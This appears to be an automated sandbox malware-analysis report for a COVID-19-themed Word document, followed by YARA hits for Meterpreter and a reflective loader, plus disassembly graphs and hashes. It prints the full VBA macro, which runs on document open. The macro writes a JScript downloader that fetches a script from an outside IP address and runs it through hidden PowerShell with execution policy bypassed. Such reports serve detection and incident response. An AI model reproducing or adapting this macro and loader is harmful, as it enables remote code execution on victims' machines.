                  Imagebase:0xb40000
                  File size:44520 bytes
                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: netbiosX, Florian Roth
                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: unknown
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Author: Florian Roth

                  Disassembly

                  Code Analysis

                  Call Graph

                  Graph

                  Module: ThisDocument

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "ThisDocument"

                  2

                  Attribute VB_Base = "1Normal.ThisDocument"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = True

                  8

                  Attribute VB_Customizable = True

                  Executed Functions
                  APIsMeta Information

                  Open

                  Dir

                  Path

                  ActiveDocument

                  Replace

                  Replace("COVID-19.doc",".doc","") -> COVID-19

                  Name

                  Replace

                  Replace("C:\Users\jones\Desktop\COVID-19","\","\\") -> C:\\Users\\jones\\Desktop\\COVID-19 Replace("var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = '%%PS%%.ps1' while (true) { o.Open('GET','%%U%%',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }","%%PS%%","C:\\Users\\jones\\Desktop\\COVID-19") -> var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = 'C:\\Users\\jones\\Desktop\\COVID-19.ps1' while (true) { o.Open('GET','%%U%%',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }

                  Label1

                  Replace

                  Replace("var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = 'C:\\Users\\jones\\Desktop\\COVID-19.ps1' while (true) { o.Open('GET','%%U%%',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }","%%U%%","http://78.141.194.181/d569872345345.txt") -> var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = 'C:\\Users\\jones\\Desktop\\COVID-19.ps1' while (true) { o.Open('GET','http://78.141.194.181/d569872345345.txt',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }

                  Open

                  Open("C:\Users\jones\Desktop\COVID-19.tmp")

                  Shell

                  Shell("wscript /e:jscript C:\Users\jones\Desktop\COVID-19.tmp",0) -> 4248

                  DateAdd

                  Now

                  DoEvents

                  Now

                  Kill

                  StringsDecrypted Strings
                  """"
                  "%%PS%%"
                  "%%U%%"
                  "\"
                  "\\"
                  "http://78.141.194.181/d569872345345.txt"
                  "s"
                  "wscript /e:jscript "
                  "x:\"
                  "%%PS%%"
                  "\"
                  "\\"
                  "%%U%%"
                  "http://78.141.194.181/d569872345345.txt"
                  "wscript /e:jscript "
                  "s"
                  LineInstructionMeta Information
                  9

                  Sub Document_Open()

                  10

                  Dim s, f, c

                  executed
                  11

                  If Dir("x:\", 31) = "" Then

                  Open

                  Dir

                  12

                  f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")

                  Path

                  ActiveDocument

                  Replace("COVID-19.doc",".doc","") -> COVID-19

                  Name

                  executed
                  13

                  s = Replace(UserForm1.Label1.Caption, "%%PS%%", Replace(f, "\", "\\"))

                  Replace("C:\Users\jones\Desktop\COVID-19","\","\\") -> C:\\Users\\jones\\Desktop\\COVID-19

                  Label1

                  executed
                  14

                  s = Replace(s, "%%U%%", "http://78.141.194.181/d569872345345.txt")

                  Replace("var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = 'C:\\Users\\jones\\Desktop\\COVID-19.ps1' while (true) { o.Open('GET','%%U%%',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }","%%U%%","http://78.141.194.181/d569872345345.txt") -> var o = WScript.CreateObject("MSXML2.XMLHTTP"); var ps = 'C:\\Users\\jones\\Desktop\\COVID-19.ps1' while (true) { o.Open('GET','http://78.141.194.181/d569872345345.txt',0); o.Send(); if (o.Status==200) { var so = new ActiveXObject('Scripting.FileSystemObject'); var fo = so.CreateTextFile(ps, true, true); fo.WriteLine(o.responseText); fo.Close(); var c = 'powershell -ex bypass -win hid -f ' + ps; (new ActiveXObject("WScript.Shell")).Run(c, 0); WScript.Quit(); } }

                  executed
                  15

                  f = f + ".tmp"

                  16

                  Open f For Output As # 19

                  Open("C:\Users\jones\Desktop\COVID-19.tmp")

                  executed
                  16

                  Print # 19, s

                  16

                  Close # 19

                  17

                  c = "wscript /e:jscript " + f

                  18

                  Shell c, 0

                  Shell("wscript /e:jscript C:\Users\jones\Desktop\COVID-19.tmp",0) -> 4248

                  executed
                  19

                  et = DateAdd("s", 4, Now)

                  DateAdd

                  Now

                  20

                  Do

                  Now

                  21

                  DoEvents

                  DoEvents

                  22

                  Loop Until Now >= et

                  Now

                  23

                  Kill f

                  Kill

                  24

                  Endif

                  25

                  End Sub

                  Module: UserForm1

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "UserForm1"

                  2

                  Attribute VB_Base = "0{EEC403EE-FAB8-4A13-9155-CB1083A2327C}{01CA9512-A004-492F-8D67-D51B2C55D4A5}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = False

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = False

                  Non-Executed Functions
                  LineInstructionMeta Information
                  9

                  Private Sub Label1_Click()

                  11

                  End Sub

                  LineInstructionMeta Information
                  13

                  Private Sub UserForm_Click()

                  15

                  End Sub

                  Reset < >

                    Execution Graph

                    Execution Coverage:10.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:17
                    Total number of Limit Nodes:2

                    Graph

                    execution_graph 26997 7cf6088 26998 7cf609a 26997->26998 27002 7cf6111 26998->27002 27009 7cf6120 26998->27009 26999 7cf610b 27003 7cf6120 27002->27003 27015 7cf55b4 27003->27015 27005 7cf6134 27005->26999 27007 7cf61d6 SetConsoleCtrlHandler 27008 7cf6212 27007->27008 27008->26999 27010 7cf55b4 SetConsoleCtrlHandler 27009->27010 27012 7cf6130 27010->27012 27011 7cf6134 27011->26999 27012->27011 27013 7cf61d6 SetConsoleCtrlHandler 27012->27013 27014 7cf6212 27013->27014 27014->26999 27016 7cf6180 SetConsoleCtrlHandler 27015->27016 27018 7cf6130 27016->27018 27018->27005 27018->27007

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 761 7cf36cd-7cf36e0 762 7cf36e6-7cf3745 761->762 763 7cf36e2-7cf36e4 761->763 767 7cf374c-7cf37ea 762->767 768 7cf3747 762->768 763->762 778 7cf38c3-7cf3be3 767->778 779 7cf37f0 767->779 768->767 834 7cf3be9-7cf3bfb 778->834 835 7cf4141-7cf4156 778->835 780 7cf37f6-7cf3830 779->780 1019 7cf3836 call 7cf4e98 780->1019 1020 7cf3836 call 7cf4e92 780->1020 786 7cf383c-7cf38bd 786->778 786->780 840 7cf4be4 834->840 843 7cf3c01-7cf3c50 834->843 836 7cf415c-7cf4168 835->836 837 7cf4285-7cf478c 835->837 839 7cf416e-7cf41c7 836->839 836->840 970 7cf4798-7cf4be2 837->970 855 7cf41cd-7cf41d6 839->855 856 7cf4270-7cf427f 839->856 841 7cf4be9-7cf4bef 840->841 845 7cf4bf9 841->845 846 7cf4bf1 841->846 843->840 858 7cf3c56-7cf3ca5 843->858 850 7cf4bfa 845->850 846->845 850->850 855->840 859 7cf41dc-7cf426a 855->859 856->836 856->837 858->840 870 7cf3cab-7cf3cc1 858->870 859->855 859->856 870->840 871 7cf3cc7-7cf3d1a 870->871 871->840 881 7cf3d20-7cf3d36 871->881 881->840 883 7cf3d3c-7cf3d84 881->883 889 7cf3d8a-7cf3da0 883->889 890 7cf4132-7cf413b 883->890 889->840 893 7cf3da6-7cf3db3 889->893 890->834 890->835 893->840 895 7cf3db9-7cf3e0b 893->895 895->840 902 7cf3e11-7cf3e1e 895->902 902->840 903 7cf3e24-7cf3e7b 902->903 903->840 911 7cf3e81-7cf3e94 903->911 911->840 913 7cf3e9a-7cf3ef0 911->913 913->840 920 7cf3ef6-7cf3f09 913->920 920->840 921 7cf3f0f-7cf3f62 920->921 921->840 929 7cf3f68-7cf3f78 921->929 929->840 931 7cf3f7e-7cf3fd7 929->931 931->840 938 7cf3fdd-7cf3fed 931->938 938->840 939 7cf3ff3-7cf4047 938->939 939->840 947 7cf404d-7cf405d 939->947 947->840 949 7cf4063-7cf40bc 947->949 949->840 956 7cf40c2-7cf40d8 949->956 956->840 957 7cf40de-7cf412c 956->957 957->889 957->890 970->841 1019->786 1020->786
                    Memory Dump Source
                    • Source File: 00000002.00000002.711433512.0000000007CF0000.00000040.00000001.sdmp, Offset: 07CF0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cf0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 41b09f53e3f2a4600a676dfea7b0907d815769c194b778ea5ed64b88ca20cba5
                    • Instruction ID: dde5710b4e27edeaeff9e50a791717fdc64c325b66757608fe2ddee4518fd33e
                    • Opcode Fuzzy Hash: 41b09f53e3f2a4600a676dfea7b0907d815769c194b778ea5ed64b88ca20cba5
                    • Instruction Fuzzy Hash: 14B271B4A00328AFEB54DB64CC90BEDB7B6EF88714F008599E649BB250CB316D81DF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2246 74f62d0-74f64ba 2266 74f64c1-74f66da 2246->2266 2293 74f68af-74f6a7e 2266->2293 2294 74f66e0-74f66f0 2266->2294 2336 74f6b7e-74f6b95 2293->2336 2337 74f6a84-74f6b79 2293->2337 2297 74f66fe 2294->2297 2298 74f66f2-74f66fc 2294->2298 2299 74f6703-74f6705 2297->2299 2298->2299 2301 74f670f-74f671d 2299->2301 2302 74f6707-74f670d 2299->2302 2304 74f671f-74f68ae 2301->2304 2302->2304 2343 74f6b97-74f6ba3 2336->2343 2344 74f6ba5-74f6bb3 2336->2344 2358 74f6cd2-74f6cea 2337->2358 2346 74f6bb9-74f6cca 2343->2346 2344->2346 2346->2358 2360 74f6cec 2358->2360 2361 74f6cf1-74f6d24 2358->2361 2360->2361 2365 74f6d26 2361->2365 2366 74f6d31 2361->2366 2365->2366 2368 74f6d32 2366->2368 2368->2368
                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ef44c85dccfe8c988a79a16f66d44ddd80e1f9ff3b5582d3142dc118782d8afe
                    • Instruction ID: cab37f0a49e5b49454949fb5425289a8a061990a0bc27af96e640d3ebade8f6c
                    • Opcode Fuzzy Hash: ef44c85dccfe8c988a79a16f66d44ddd80e1f9ff3b5582d3142dc118782d8afe
                    • Instruction Fuzzy Hash: B642A334A102199FEB24DB64CC10BAAB772EFC5704F10C5AAE9097B391DF75AD818F61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2519 74f62c0-74f648f 2539 74f6496-74f64ba 2519->2539 2540 74f64c1-74f66da 2539->2540 2567 74f68af-74f6a7e 2540->2567 2568 74f66e0-74f66f0 2540->2568 2610 74f6b7e-74f6b95 2567->2610 2611 74f6a84-74f6b79 2567->2611 2571 74f66fe 2568->2571 2572 74f66f2-74f66fc 2568->2572 2573 74f6703-74f6705 2571->2573 2572->2573 2575 74f670f-74f671d 2573->2575 2576 74f6707-74f670d 2573->2576 2578 74f671f-74f68ae 2575->2578 2576->2578 2617 74f6b97-74f6ba3 2610->2617 2618 74f6ba5-74f6bb3 2610->2618 2632 74f6cd2-74f6cea 2611->2632 2620 74f6bb9-74f6cca 2617->2620 2618->2620 2620->2632 2634 74f6cec 2632->2634 2635 74f6cf1-74f6d24 2632->2635 2634->2635 2639 74f6d26 2635->2639 2640 74f6d31 2635->2640 2639->2640 2642 74f6d32 2640->2642 2642->2642
                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ede8ec8697e9e3954a59c6deff4b847e89dc1a698050d9c042b2bac19a9e101
                    • Instruction ID: 00fa29319044ee81eee84bd24a4e86e39d1b6a342f833480812c720c75daa903
                    • Opcode Fuzzy Hash: 3ede8ec8697e9e3954a59c6deff4b847e89dc1a698050d9c042b2bac19a9e101
                    • Instruction Fuzzy Hash: 22E1A334A003199FEB14EB64CC50BEAB772EFC5704F1085A9E9097B391DF75AD818B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 708 7cf6120-7cf6132 call 7cf55b4 711 7cf6138-7cf61ca 708->711 712 7cf6134-7cf6137 708->712 720 7cf61cc 711->720 721 7cf61d6-7cf6210 SetConsoleCtrlHandler 711->721 724 7cf61d4 720->724 722 7cf6219-7cf624d 721->722 723 7cf6212-7cf6218 721->723 723->722 724->721
                    Memory Dump Source
                    • Source File: 00000002.00000002.711433512.0000000007CF0000.00000040.00000001.sdmp, Offset: 07CF0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cf0000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleCtrlHandler
                    • String ID:
                    • API String ID: 1513847179-0
                    • Opcode ID: 01235c28ffb1cc799a9643d9e70633fb7f93bdbcfba3482b27c28d28d93843bd
                    • Instruction ID: 83f25961ac67611cd86be74ad08b2a653e33fbdc30fb0d86983f6e2bef00db05
                    • Opcode Fuzzy Hash: 01235c28ffb1cc799a9643d9e70633fb7f93bdbcfba3482b27c28d28d93843bd
                    • Instruction Fuzzy Hash: D231CFB1A043499FCB10DFA9D8457EEBFF1AF85314F14806AD458A7381DB389945CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 728 7cf55a7-7cf61ca 731 7cf61cc 728->731 732 7cf61d6-7cf6210 SetConsoleCtrlHandler 728->732 735 7cf61d4 731->735 733 7cf6219-7cf624d 732->733 734 7cf6212-7cf6218 732->734 734->733 735->732
                    APIs
                    • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07CF6203
                    Memory Dump Source
                    • Source File: 00000002.00000002.711433512.0000000007CF0000.00000040.00000001.sdmp, Offset: 07CF0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cf0000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleCtrlHandler
                    • String ID:
                    • API String ID: 1513847179-0
                    • Opcode ID: ca5af58d4c26b8251244964c92679e4253396d5214e3c847c0a6df0e195475b4
                    • Instruction ID: 1d4c88ebedb1dd988f215eca3a2d5134dc87d21e509d40f5b46c1105839423e4
                    • Opcode Fuzzy Hash: ca5af58d4c26b8251244964c92679e4253396d5214e3c847c0a6df0e195475b4
                    • Instruction Fuzzy Hash: DB215AB1D106198FCB10CFA9C8847EEBBF1FB88314F148429D459A3381DB38A946CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 739 7cf6178-7cf61ca 742 7cf61cc 739->742 743 7cf61d6-7cf6210 SetConsoleCtrlHandler 739->743 746 7cf61d4 742->746 744 7cf6219-7cf624d 743->744 745 7cf6212-7cf6218 743->745 745->744 746->743
                    APIs
                    • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07CF6203
                    Memory Dump Source
                    • Source File: 00000002.00000002.711433512.0000000007CF0000.00000040.00000001.sdmp, Offset: 07CF0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cf0000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleCtrlHandler
                    • String ID:
                    • API String ID: 1513847179-0
                    • Opcode ID: a7f72b381f2d313d88090405c49fca58d0d6a5c680ad1357a067def028931d42
                    • Instruction ID: deddd63cc662fb4b97df32c1f21f6032bf24a97313420c73233ab238d11a116d
                    • Opcode Fuzzy Hash: a7f72b381f2d313d88090405c49fca58d0d6a5c680ad1357a067def028931d42
                    • Instruction Fuzzy Hash: 9C215EB1D002198FCB10CFA9D8457EEBBF1AF88324F14842AD455B7741DB38A945CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 750 7cf55b4-7cf61ca 753 7cf61cc 750->753 754 7cf61d6-7cf6210 SetConsoleCtrlHandler 750->754 757 7cf61d4 753->757 755 7cf6219-7cf624d 754->755 756 7cf6212-7cf6218 754->756 756->755 757->754
                    APIs
                    • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07CF6203
                    Memory Dump Source
                    • Source File: 00000002.00000002.711433512.0000000007CF0000.00000040.00000001.sdmp, Offset: 07CF0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cf0000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleCtrlHandler
                    • String ID:
                    • API String ID: 1513847179-0
                    • Opcode ID: 55c0335c891509f1cabf2af132ebec3319eb20de2a256886fb29cf83043a7510
                    • Instruction ID: 4733fc0374b3e0b8d7b0e580518384a194968c4444914785d97a00c988046395
                    • Opcode Fuzzy Hash: 55c0335c891509f1cabf2af132ebec3319eb20de2a256886fb29cf83043a7510
                    • Instruction Fuzzy Hash: 172159B1D006198FCB50CFA9C8447EEBBF5EB88324F148429D459B7381DB38A945CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1278 74fca77-74fca91 1280 74fca9b-74fcaa4 1278->1280 1281 74fcaad-74fe008 1280->1281
                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de5f8ac633ad04e497f9f493793935dffbaa07dbc775a82f02c9a6e6d215bbc4
                    • Instruction ID: 7cf5f5b72785007ce98bd5253b9becc8194432ed1dcea7961d643324dc124f0b
                    • Opcode Fuzzy Hash: de5f8ac633ad04e497f9f493793935dffbaa07dbc775a82f02c9a6e6d215bbc4
                    • Instruction Fuzzy Hash: BFB25C786012199BEB14EB60E861BDE77B3EFC4304F1095A8E54A6B794CF346D82CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1617 74fca78-74fcaa4 1619 74fcaad-74fe008 1617->1619
                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52dfb8f1c8237d6b06d661a92dc90012f78c7358717026764fdc0249826ae5e0
                    • Instruction ID: f33a43dab6746d5b9d33af731bc5462bcab0ff18239caec07107aa854b809752
                    • Opcode Fuzzy Hash: 52dfb8f1c8237d6b06d661a92dc90012f78c7358717026764fdc0249826ae5e0
                    • Instruction Fuzzy Hash: 03B25B786012199BEB14EB60E861BDE77B3EFC4304F1095A8E54A6B794CF346D82CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af581fc4a6f70a405771bb624cdb64ca52cde930ab419f201606cdaa43613383
                    • Instruction ID: d62960c03d1e78b165beec0747efb382a7cbcd4ba66be6f8a7b224bd6f8438e9
                    • Opcode Fuzzy Hash: af581fc4a6f70a405771bb624cdb64ca52cde930ab419f201606cdaa43613383
                    • Instruction Fuzzy Hash: 409169B4A006099FD704DF68C890AAEBBB2EF89314F14CA6DE4159F751CB35ED46CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0afc4cf34e0812b4563588348669f9fb4b1be00633a34d2fe7230397a1df93d
                    • Instruction ID: 528ded14fdea1c6a46483ae88a0fa83e93d43706f0954177d7d2fab1ac8aecff
                    • Opcode Fuzzy Hash: e0afc4cf34e0812b4563588348669f9fb4b1be00633a34d2fe7230397a1df93d
                    • Instruction Fuzzy Hash: BE9179B4A006099FD704EF68C890AAEB7B6EF89314F14CA6DE4059F751CB74ED46CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 09f406b40cea8ebc3a716ad7f65e397237ad911cb25b468a16043ed86b83c370
                    • Instruction ID: f3bbc80b3068707f112ae964bc498fb8c35a5812247040c08cd3c2370f1068f8
                    • Opcode Fuzzy Hash: 09f406b40cea8ebc3a716ad7f65e397237ad911cb25b468a16043ed86b83c370
                    • Instruction Fuzzy Hash: 5351A478A006098FDB04EF78C954ADE77F3AFC8604F1589A8D409AF390DB75AD068B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 94483fe64b58b798791ff10b9d1e6d7c11ac6d67fbcf15f7b164a5e2bde23727
                    • Instruction ID: 1060b2d4edd77e1e213388abaf355661e09088a41c1f20066bf2bc62373dec26
                    • Opcode Fuzzy Hash: 94483fe64b58b798791ff10b9d1e6d7c11ac6d67fbcf15f7b164a5e2bde23727
                    • Instruction Fuzzy Hash: 7D514AB4A012059FDB14DF64D884BEEBBF6FF88704F14416AE905AB7A1DB34A845CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbfaef56040e9114b8af240bb2d9e9ad0b96e4c6cf501f7d179826297ef5a379
                    • Instruction ID: f8b2eca41e27395f681d3c292fb5265e161f12ba655ba46a56855dd72dcc2a39
                    • Opcode Fuzzy Hash: dbfaef56040e9114b8af240bb2d9e9ad0b96e4c6cf501f7d179826297ef5a379
                    • Instruction Fuzzy Hash: 5D5139B4A012099FDB14DF64D894BEEBBF6FF88705F14406AE505AB3A1DB34E845CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d304e91b570cc927c426e8425a1be743b20fdea6a26f231f4d568f121f065e7
                    • Instruction ID: 5eb685a4ce0018c6c71e5ba76e052bdddfde76d6068caf6a2d4172ae1baf26ea
                    • Opcode Fuzzy Hash: 0d304e91b570cc927c426e8425a1be743b20fdea6a26f231f4d568f121f065e7
                    • Instruction Fuzzy Hash: BC51B0786002069FDB01DF60D861BAE7773FB80714F508529E9459B384DB38AD42CBE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fab05a3b18c98828ff1d7b60f4c6c21caaffaefd83bee6df40fe1e5641b2a02f
                    • Instruction ID: f957e7c554ea8f066ee137bd741c67f45ad4063b22018b0072eb17938cc15c2c
                    • Opcode Fuzzy Hash: fab05a3b18c98828ff1d7b60f4c6c21caaffaefd83bee6df40fe1e5641b2a02f
                    • Instruction Fuzzy Hash: AA41D3786043468FDB06DF20E860AEA7B73EF81214F50856ADA459F381DB389D06CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4d055cb655c949b921eb67f5b8fe660c03525c24978786c3bd4edb19d84c7408
                    • Instruction ID: b77c014981b9b5f306020dfd029af5ecc43e30976e46d61ca17624913b7a6b94
                    • Opcode Fuzzy Hash: 4d055cb655c949b921eb67f5b8fe660c03525c24978786c3bd4edb19d84c7408
                    • Instruction Fuzzy Hash: A2418DB5B006198BDB14CFA9D9002EEBBF9EF89250F15447AD605EB350EB359D42CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a6506329b34633521336222e407965866b3075ce18aad6a33d2f90ed8655e26
                    • Instruction ID: fd7d81e03cd54cd37724bd949c1b8d6a6e61cf2d52c25827b73319f0551b4c09
                    • Opcode Fuzzy Hash: 9a6506329b34633521336222e407965866b3075ce18aad6a33d2f90ed8655e26
                    • Instruction Fuzzy Hash: 3E31EFB1B00B168BDB19EF659A002EF77E9DF89650F11453BDA05EF340EB3589028BD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4c4261615424ca655a8313489b3cea563da9edc1298c82a35482e80ca613361
                    • Instruction ID: 210f24b1a6cef47a7323605b68d5eefd4f4aef9715dfad98b10fd8d789964ae8
                    • Opcode Fuzzy Hash: c4c4261615424ca655a8313489b3cea563da9edc1298c82a35482e80ca613361
                    • Instruction Fuzzy Hash: 82319379B002198FCB44DF69C890AAFB7B2EFC5711F15806AE849DB391DB349D01CBA1
